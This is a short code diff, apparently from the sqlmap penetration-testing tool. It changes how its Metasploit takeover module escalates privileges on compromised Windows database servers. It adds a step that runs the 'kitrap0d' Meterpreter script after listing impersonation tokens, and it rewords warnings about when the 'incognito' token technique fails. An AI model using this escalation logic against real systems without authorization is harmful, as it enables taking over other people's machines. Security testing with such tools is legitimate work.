diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 0436a1ebe..9bd178e71 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -187,9 +187,10 @@ class Metasploit:
     def __selectPayload(self, askChurrasco=True):
         if kb.os == "Windows" and conf.privEsc:
             infoMsg  = "forcing Metasploit payload to Meterpreter because "
-            infoMsg += "it is the only payload that can abuse Windows "
-            infoMsg += "Access Tokens via Meterpreter 'incognito' "
-            infoMsg += "extension to privilege escalate"
+            infoMsg += "it is the only payload that can be used to "
+            infoMsg += "escalate privileges, either via 'incognito' "
+            infoMsg += "extension or via 'kitrap0d' script, "
+            infoMsg += "http://tinyurl.com/kitrap0d for details"
             logger.info(infoMsg)
 
             __payloadStr = "windows/meterpreter"
@@ -458,6 +459,12 @@ class Metasploit:
 
             proc.stdin.write("list_tokens -u\n")
 
+            infoMsg  = "trying also to escalate privileges using "
+            infoMsg += "kitrap0d script"
+            logger.info(infoMsg)
+
+            proc.stdin.write("run kitrap0d\n")
+
     def __controlMsfCmd(self, proc, func):
         stdin_fd = sys.stdin.fileno()
         setNonBlocking(stdin_fd)
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index 36f7c17bf..e3232daf5 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -165,15 +165,16 @@ class Takeover(Abstraction, Metasploit, Registry):
                     warnMsg  = "by default PostgreSQL on Windows runs as postgres "
                     warnMsg += "user which has no Windows Impersonation "
                     warnMsg += "Tokens: it is unlikely that the privilege "
-                    warnMsg += "escalation will be successful"
+                    warnMsg += "escalation via 'incognito' extension will "
+                    warnMsg += "be successful"
                     logger.warn(warnMsg)
 
                 elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
                     warnMsg  = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
                     warnMsg += "runs as Network Service which has no Windows "
                     warnMsg += "Impersonation Tokens within all threads, this "
-                    warnMsg += "makes Meterpreter's incognito extension to "
-                    warnMsg += "fail to list tokens"
+                    warnMsg += "makes Meterpreter's 'incognito' extension "
+                    warnMsg += "to fail to list tokens"
                     logger.warn(warnMsg)
 
                     uploaded = self.uploadChurrasco()